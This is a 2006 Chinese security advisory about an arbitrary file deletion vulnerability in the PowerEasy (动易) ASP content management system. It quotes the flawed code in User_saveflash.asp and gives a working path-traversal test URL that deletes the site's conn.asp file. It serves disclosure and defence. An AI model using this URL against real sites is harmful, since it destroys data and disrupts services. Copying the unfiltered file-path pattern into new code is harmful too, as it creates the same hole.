信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )
发布日期:2006-12-20 应急事件响应公告(BCTCERA0612)
受影响系统:动易
网站管理系统所有版本
安全综述:动易
网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效
网站内容管理解决方案产品。
漏洞描述:User\User_saveflash.asp文件第97行
whichfile=trim(request("color_url"))
Set Colortxt = fso.OpenTextFile(server.mappath(whichfile),1)
rline = Colortxt.ReadLine
badwords = split(rline,"|")
Colortxt.Close
fso.deleteFile(server.mappath(whichfile))
此代码的位于第79行的CoverColorFile过程,触发条件在第16行,代码如下:
act = trim(request("act"))
If act="" Then
Call Main()
Else
Call CoverColorFile()
End If
此
漏洞可以在构造合理的act和color_url后可以删除任何文件
测试方法:构造如下语句,可以删除conn.asp文件:User/User_saveflash.asp?act=aa&color_url=../conn.asp
解决方案:对于没有做好过滤的部分,进行严格的过滤以及修补工作。在有文件读写操作的地方,对客户端抱不信任的态度。
[推荐]动易User\User_saveflash.asp页面存在任意文件删除漏洞
您现在的位置: